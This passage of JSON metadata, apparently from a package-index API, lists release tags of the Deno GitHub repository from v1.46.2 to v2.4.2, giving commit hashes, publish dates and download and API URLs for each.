2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"http